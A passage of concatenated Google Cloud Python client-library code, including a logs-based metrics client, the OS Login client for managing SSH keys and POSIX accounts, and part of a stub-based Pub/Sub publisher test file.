client_info.gapic_version = _GAPIC_LIBRARY_VERSION
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config['interfaces'][self._INTERFACE_NAME], )
# Write the "inner API call" methods to the class.
# These are wrapped versions of the gRPC stub methods, with retry and
# timeout configuration applied, called by the public methods on
# this class.
self._list_log_metrics = google.api_core.gapic_v1.method.wrap_method(
self.metrics_service_v2_stub.ListLogMetrics,
default_retry=method_configs['ListLogMetrics'].retry,
default_timeout=method_configs['ListLogMetrics'].timeout,
client_info=client_info,
)
self._get_log_metric = google.api_core.gapic_v1.method.wrap_method(
self.metrics_service_v2_stub.GetLogMetric,
default_retry=method_configs['GetLogMetric'].retry,
default_timeout=method_configs['GetLogMetric'].timeout,
client_info=client_info,
)
self._create_log_metric = google.api_core.gapic_v1.method.wrap_method(
self.metrics_service_v2_stub.CreateLogMetric,
default_retry=method_configs['CreateLogMetric'].retry,
default_timeout=method_configs['CreateLogMetric'].timeout,
client_info=client_info,
)
self._update_log_metric = google.api_core.gapic_v1.method.wrap_method(
self.metrics_service_v2_stub.UpdateLogMetric,
default_retry=method_configs['UpdateLogMetric'].retry,
default_timeout=method_configs['UpdateLogMetric'].timeout,
client_info=client_info,
)
self._delete_log_metric = google.api_core.gapic_v1.method.wrap_method(
self.metrics_service_v2_stub.DeleteLogMetric,
default_retry=method_configs['DeleteLogMetric'].retry,
default_timeout=method_configs['DeleteLogMetric'].timeout,
client_info=client_info,
)
# Service calls
def list_log_metrics(self,
parent,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Lists logs-based metrics.
Example:
>>> from google.cloud import logging_v2
>>>
>>> client = logging_v2.MetricsServiceV2Client()
>>>
>>> parent = client.project_path('[PROJECT]')
>>>
>>>
>>> # Iterate over all results
>>> for element in client.list_log_metrics(parent):
... # process element
... pass
>>>
>>> # Or iterate over results one page at a time
            >>> for page in client.list_log_metrics(parent).pages:
... for element in page:
... # process element
... pass
Args:
parent (str): Required. The name of the project containing the metrics:
::
\"projects/[PROJECT_ID]\"
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
            A :class:`~google.api_core.page_iterator.GRPCIterator` instance.
            By default, this is an iterable of
            :class:`~google.cloud.logging_v2.types.LogMetric` instances.
            The pages of the response can also be iterated over via the
            iterator's ``pages`` attribute, as in the example above.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = logging_metrics_pb2.ListLogMetricsRequest(
parent=parent,
page_size=page_size,
)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._list_log_metrics,
retry=retry,
timeout=timeout,
metadata=metadata),
request=request,
items_field='metrics',
request_token_field='page_token',
response_token_field='next_page_token',
)
return iterator
def get_log_metric(self,
metric_name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Gets a logs-based metric.
Example:
>>> from google.cloud import logging_v2
>>>
>>> client = logging_v2.MetricsServiceV2Client()
>>>
>>> metric_name = client.metric_path('[PROJECT]', '[METRIC]')
>>>
>>> response = client.get_log_metric(metric_name)
Args:
metric_name (str): The resource name of the desired metric:
::
\"projects/[PROJECT_ID]/metrics/[METRIC_ID]\"
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.logging_v2.types.LogMetric` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = logging_metrics_pb2.GetLogMetricRequest(
metric_name=metric_name, )
return self._get_log_metric(
request, retry=retry, timeout=timeout, metadata=metadata)
def create_log_metric(self,
parent,
metric,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Creates a logs-based metric.
Example:
>>> from google.cloud import logging_v2
>>>
>>> client = logging_v2.MetricsServiceV2Client()
>>>
>>> parent = client.project_path('[PROJECT]')
>>> metric = {}
>>>
>>> response = client.create_log_metric(parent, metric)
Args:
parent (str): The resource name of the project in which to create the metric:
::
\"projects/[PROJECT_ID]\"
The new metric must be provided in the request.
metric (Union[dict, ~google.cloud.logging_v2.types.LogMetric]): The new logs-based metric, which must not have an identifier that
already exists.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.logging_v2.types.LogMetric`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.logging_v2.types.LogMetric` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = logging_metrics_pb2.CreateLogMetricRequest(
parent=parent,
metric=metric,
)
return self._create_log_metric(
request, retry=retry, timeout=timeout, metadata=metadata)
def update_log_metric(self,
metric_name,
metric,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Creates or updates a logs-based metric.
Example:
>>> from google.cloud import logging_v2
>>>
>>> client = logging_v2.MetricsServiceV2Client()
>>>
>>> metric_name = client.metric_path('[PROJECT]', '[METRIC]')
>>> metric = {}
>>>
>>> response = client.update_log_metric(metric_name, metric)
Args:
metric_name (str): The resource name of the metric to update:
::
\"projects/[PROJECT_ID]/metrics/[METRIC_ID]\"
                The updated metric must be provided in the request and its
                ``name`` field must be the same as ``[METRIC_ID]``. If the metric
does not exist in ``[PROJECT_ID]``, then a new metric is created.
metric (Union[dict, ~google.cloud.logging_v2.types.LogMetric]): The updated metric.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.logging_v2.types.LogMetric`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.logging_v2.types.LogMetric` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = logging_metrics_pb2.UpdateLogMetricRequest(
metric_name=metric_name,
metric=metric,
)
return self._update_log_metric(
request, retry=retry, timeout=timeout, metadata=metadata)
def delete_log_metric(self,
metric_name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Deletes a logs-based metric.
Example:
>>> from google.cloud import logging_v2
>>>
>>> client = logging_v2.MetricsServiceV2Client()
>>>
>>> metric_name = client.metric_path('[PROJECT]', '[METRIC]')
>>>
>>> client.delete_log_metric(metric_name)
Args:
metric_name (str): The resource name of the metric to delete:
::
\"projects/[PROJECT_ID]/metrics/[METRIC_ID]\"
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = logging_metrics_pb2.DeleteLogMetricRequest(
metric_name=metric_name, )
self._delete_log_metric(
request, retry=retry, timeout=timeout, metadata=metadata)
```
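Taken together, the docstring examples above describe a full metric lifecycle. The sketch below strings them into one flow; it assumes application default credentials and an existing project, and the metric name and filter are illustrative, so treat it as a usage outline rather than a verified script.

```python
# Lifecycle sketch assembled from the docstring examples above (assumes
# application default credentials; project and metric values are examples).
from google.cloud import logging_v2

client = logging_v2.MetricsServiceV2Client()
parent = client.project_path('my-project')

# Create a logs-based metric counting ERROR-and-above entries.
metric = {'name': 'error_count', 'filter': 'severity>=ERROR'}
client.create_log_metric(parent, metric)

# Fetch, list, and finally delete it.
metric_name = client.metric_path('my-project', 'error_count')
client.get_log_metric(metric_name)
for element in client.list_log_metrics(parent):
    print(element.name)
client.delete_log_metric(metric_name)
```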
#### File: oslogin_v1/gapic/os_login_service_client.py
```python
import pkg_resources
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.grpc_helpers
import google.api_core.path_template
from google.cloud.oslogin_v1.gapic import os_login_service_client_config
from google.cloud.oslogin_v1.proto import common_pb2
from google.cloud.oslogin_v1.proto import oslogin_pb2
from google.protobuf import field_mask_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution(
'google-cloud-os-login', ).version
class OsLoginServiceClient(object):
"""
Cloud OS Login API
The Cloud OS Login API allows you to manage users and their associated SSH
public keys for logging into virtual machines on Google Cloud Platform.
"""
SERVICE_ADDRESS = 'oslogin.googleapis.com:443'
"""The default address of the service."""
# The scopes needed to make gRPC calls to all of the methods defined in
# this service
_DEFAULT_SCOPES = (
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/cloud-platform.read-only',
'https://www.googleapis.com/auth/compute',
'https://www.googleapis.com/auth/compute.readonly',
)
# The name of the interface for this client. This is the key used to find
# method configuration in the client_config dictionary.
_INTERFACE_NAME = 'google.cloud.oslogin.v1.OsLoginService'
@classmethod
def user_path(cls, user):
"""Return a fully-qualified user string."""
return google.api_core.path_template.expand(
'users/{user}',
user=user,
)
@classmethod
def project_path(cls, user, project):
"""Return a fully-qualified project string."""
return google.api_core.path_template.expand(
'users/{user}/projects/{project}',
user=user,
project=project,
)
@classmethod
def fingerprint_path(cls, user, fingerprint):
"""Return a fully-qualified fingerprint string."""
return google.api_core.path_template.expand(
'users/{user}/sshPublicKeys/{fingerprint}',
user=user,
fingerprint=fingerprint,
)
def __init__(self,
channel=None,
credentials=None,
client_config=os_login_service_client_config.config,
client_info=None):
"""Constructor.
Args:
channel (grpc.Channel): A ``Channel`` instance through
which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
client_config (dict): A dictionary of call options for each
method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# If both `channel` and `credentials` are specified, raise an
# exception (channels come with credentials baked in already).
if channel is not None and credentials is not None:
raise ValueError(
'The `channel` and `credentials` arguments to {} are mutually '
'exclusive.'.format(self.__class__.__name__), )
# Create the channel.
if channel is None:
channel = google.api_core.grpc_helpers.create_channel(
self.SERVICE_ADDRESS,
credentials=credentials,
scopes=self._DEFAULT_SCOPES,
)
# Create the gRPC stubs.
self.os_login_service_stub = (oslogin_pb2.OsLoginServiceStub(channel))
if client_info is None:
client_info = (
google.api_core.gapic_v1.client_info.DEFAULT_CLIENT_INFO)
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config['interfaces'][self._INTERFACE_NAME], )
# Write the "inner API call" methods to the class.
# These are wrapped versions of the gRPC stub methods, with retry and
# timeout configuration applied, called by the public methods on
# this class.
self._delete_posix_account = google.api_core.gapic_v1.method.wrap_method(
self.os_login_service_stub.DeletePosixAccount,
default_retry=method_configs['DeletePosixAccount'].retry,
default_timeout=method_configs['DeletePosixAccount'].timeout,
client_info=client_info,
)
self._delete_ssh_public_key = google.api_core.gapic_v1.method.wrap_method(
self.os_login_service_stub.DeleteSshPublicKey,
default_retry=method_configs['DeleteSshPublicKey'].retry,
default_timeout=method_configs['DeleteSshPublicKey'].timeout,
client_info=client_info,
)
self._get_login_profile = google.api_core.gapic_v1.method.wrap_method(
self.os_login_service_stub.GetLoginProfile,
default_retry=method_configs['GetLoginProfile'].retry,
default_timeout=method_configs['GetLoginProfile'].timeout,
client_info=client_info,
)
self._get_ssh_public_key = google.api_core.gapic_v1.method.wrap_method(
self.os_login_service_stub.GetSshPublicKey,
default_retry=method_configs['GetSshPublicKey'].retry,
default_timeout=method_configs['GetSshPublicKey'].timeout,
client_info=client_info,
)
self._import_ssh_public_key = google.api_core.gapic_v1.method.wrap_method(
self.os_login_service_stub.ImportSshPublicKey,
default_retry=method_configs['ImportSshPublicKey'].retry,
default_timeout=method_configs['ImportSshPublicKey'].timeout,
client_info=client_info,
)
self._update_ssh_public_key = google.api_core.gapic_v1.method.wrap_method(
self.os_login_service_stub.UpdateSshPublicKey,
default_retry=method_configs['UpdateSshPublicKey'].retry,
default_timeout=method_configs['UpdateSshPublicKey'].timeout,
client_info=client_info,
)
# Service calls
def delete_posix_account(self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Deletes a POSIX account.
Example:
>>> from google.cloud import oslogin_v1
>>>
>>> client = oslogin_v1.OsLoginServiceClient()
>>>
>>> name = client.project_path('[USER]', '[PROJECT]')
>>>
>>> client.delete_posix_account(name)
Args:
            name (str): A reference to the POSIX account to delete. POSIX accounts are identified
by the project ID they are associated with. A reference to the POSIX
account is in format ``users/{user}/projects/{project}``.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = oslogin_pb2.DeletePosixAccountRequest(name=name, )
self._delete_posix_account(
request, retry=retry, timeout=timeout, metadata=metadata)
def delete_ssh_public_key(self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Deletes an SSH public key.
Example:
>>> from google.cloud import oslogin_v1
>>>
>>> client = oslogin_v1.OsLoginServiceClient()
>>>
>>> name = client.fingerprint_path('[USER]', '[FINGERPRINT]')
>>>
>>> client.delete_ssh_public_key(name)
Args:
            name (str): The fingerprint of the public key to delete. Public keys are identified by
their SHA-256 fingerprint. The fingerprint of the public key is in format
``users/{user}/sshPublicKeys/{fingerprint}``.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = oslogin_pb2.DeleteSshPublicKeyRequest(name=name, )
self._delete_ssh_public_key(
request, retry=retry, timeout=timeout, metadata=metadata)
def get_login_profile(self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Retrieves the profile information used for logging in to a virtual machine
on Google Compute Engine.
Example:
>>> from google.cloud import oslogin_v1
>>>
>>> client = oslogin_v1.OsLoginServiceClient()
>>>
>>> name = client.user_path('[USER]')
>>>
>>> response = client.get_login_profile(name)
Args:
name (str): The unique ID for the user in format ``users/{user}``.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.oslogin_v1.types.LoginProfile` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = oslogin_pb2.GetLoginProfileRequest(name=name, )
return self._get_login_profile(
request, retry=retry, timeout=timeout, metadata=metadata)
def get_ssh_public_key(self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Retrieves an SSH public key.
Example:
>>> from google.cloud import oslogin_v1
>>>
>>> client = oslogin_v1.OsLoginServiceClient()
>>>
>>> name = client.fingerprint_path('[USER]', '[FINGERPRINT]')
>>>
>>> response = client.get_ssh_public_key(name)
Args:
name (str): The fingerprint of the public key to retrieve. Public keys are identified
by their SHA-256 fingerprint. The fingerprint of the public key is in
format ``users/{user}/sshPublicKeys/{fingerprint}``.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.oslogin_v1.types.SshPublicKey` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = oslogin_pb2.GetSshPublicKeyRequest(name=name, )
return self._get_ssh_public_key(
request, retry=retry, timeout=timeout, metadata=metadata)
def import_ssh_public_key(self,
parent,
ssh_public_key,
project_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Adds an SSH public key and returns the profile information. Default POSIX
account information is set when no username and UID exist as part of the
login profile.
Example:
>>> from google.cloud import oslogin_v1
>>>
>>> client = oslogin_v1.OsLoginServiceClient()
>>>
>>> parent = client.user_path('[USER]')
>>> ssh_public_key = {}
>>>
>>> response = client.import_ssh_public_key(parent, ssh_public_key)
Args:
parent (str): The unique ID for the user in format ``users/{user}``.
ssh_public_key (Union[dict, ~google.cloud.oslogin_v1.types.SshPublicKey]): The SSH public key and expiration time.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.oslogin_v1.types.SshPublicKey`
project_id (str): The project ID of the Google Cloud Platform project.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.oslogin_v1.types.ImportSshPublicKeyResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = oslogin_pb2.ImportSshPublicKeyRequest(
parent=parent,
ssh_public_key=ssh_public_key,
project_id=project_id,
)
return self._import_ssh_public_key(
request, retry=retry, timeout=timeout, metadata=metadata)
def update_ssh_public_key(self,
name,
ssh_public_key,
update_mask=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Updates an SSH public key and returns the profile information. This method
supports patch semantics.
Example:
>>> from google.cloud import oslogin_v1
>>>
>>> client = oslogin_v1.OsLoginServiceClient()
>>>
>>> name = client.fingerprint_path('[USER]', '[FINGERPRINT]')
>>> ssh_public_key = {}
>>>
>>> response = client.update_ssh_public_key(name, ssh_public_key)
Args:
name (str): The fingerprint of the public key to update. Public keys are identified by
their SHA-256 fingerprint. The fingerprint of the public key is in format
``users/{user}/sshPublicKeys/{fingerprint}``.
ssh_public_key (Union[dict, ~google.cloud.oslogin_v1.types.SshPublicKey]): The SSH public key and expiration time.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.oslogin_v1.types.SshPublicKey`
update_mask (Union[dict, ~google.cloud.oslogin_v1.types.FieldMask]): Mask to control which fields get updated. Updates all if not present.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.oslogin_v1.types.FieldMask`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.oslogin_v1.types.SshPublicKey` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = oslogin_pb2.UpdateSshPublicKeyRequest(
name=name,
ssh_public_key=ssh_public_key,
update_mask=update_mask,
)
return self._update_ssh_public_key(
request, retry=retry, timeout=timeout, metadata=metadata)
```
#### File: gapic/v1/test_publisher_client_v1.py
```python
import pytest
from google.cloud.pubsub_v1.gapic import publisher_client
from google.cloud.pubsub_v1.proto import pubsub_pb2
from google.iam.v1 import iam_policy_pb2
from google.iam.v1 import policy_pb2
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
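        # Record the call on the channel stub so tests can assert on the request,
        # then replay the next canned response (raising it if it is an exception).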
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
    def __init__(self, responses=None):
        self.responses = responses if responses is not None else []
self.requests = []
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestPublisherClient(object):
def test_create_topic(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
expected_response = {'name': name_2}
expected_response = pubsub_pb2.Topic(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
name = client.topic_path('[PROJECT]', '[TOPIC]')
response = client.create_topic(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = pubsub_pb2.Topic(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_topic_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
name = client.topic_path('[PROJECT]', '[TOPIC]')
with pytest.raises(CustomException):
client.create_topic(name)
def test_update_topic(self):
# Setup Expected Response
name = 'name3373707'
expected_response = {'name': name}
expected_response = pubsub_pb2.Topic(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
topic = {}
update_mask = {}
response = client.update_topic(topic, update_mask)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = pubsub_pb2.UpdateTopicRequest(
topic=topic, update_mask=update_mask)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_update_topic_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
topic = {}
update_mask = {}
with pytest.raises(CustomException):
client.update_topic(topic, update_mask)
def test_publish(self):
# Setup Expected Response
message_ids_element = 'messageIdsElement-744837059'
message_ids = [message_ids_element]
expected_response = {'message_ids': message_ids}
expected_response = pubsub_pb2.PublishResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
data = b'-86'
messages_element = {'data': data}
messages = [messages_element]
response = client.publish(topic, messages)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = pubsub_pb2.PublishRequest(
topic=topic, messages=messages)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_publish_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
data = b'-86'
messages_element = {'data': data}
messages = [messages_element]
with pytest.raises(CustomException):
client.publish(topic, messages)
def test_get_topic(self):
# Setup Expected Response
name = 'name3373707'
expected_response = {'name': name}
expected_response = pubsub_pb2.Topic(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
response = client.get_topic(topic)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = pubsub_pb2.GetTopicRequest(topic=topic)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_topic_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
with pytest.raises(CustomException):
client.get_topic(topic)
def test_list_topics(self):
# Setup Expected Response
next_page_token = ''
topics_element = {}
topics = [topics_element]
expected_response = {
'next_page_token': next_page_token,
'topics': topics
}
expected_response = pubsub_pb2.ListTopicsResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
project = client.project_path('[PROJECT]')
paged_list_response = client.list_topics(project)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.topics[0] == resources[0]
assert len(channel.requests) == 1
expected_request = pubsub_pb2.ListTopicsRequest(project=project)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_topics_exception(self):
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
project = client.project_path('[PROJECT]')
paged_list_response = client.list_topics(project)
with pytest.raises(CustomException):
list(paged_list_response)
def test_list_topic_subscriptions(self):
# Setup Expected Response
next_page_token = ''
subscriptions_element = 'subscriptionsElement1698708147'
subscriptions = [subscriptions_element]
expected_response = {
'next_page_token': next_page_token,
'subscriptions': subscriptions
}
expected_response = pubsub_pb2.ListTopicSubscriptionsResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
paged_list_response = client.list_topic_subscriptions(topic)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.subscriptions[0] == resources[0]
assert len(channel.requests) == 1
expected_request = pubsub_pb2.ListTopicSubscriptionsRequest(
topic=topic)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_topic_subscriptions_exception(self):
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
paged_list_response = client.list_topic_subscriptions(topic)
with pytest.raises(CustomException):
list(paged_list_response)
def test_delete_topic(self):
channel = ChannelStub()
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
client.delete_topic(topic)
assert len(channel.requests) == 1
expected_request = pubsub_pb2.DeleteTopicRequest(topic=topic)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_topic_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
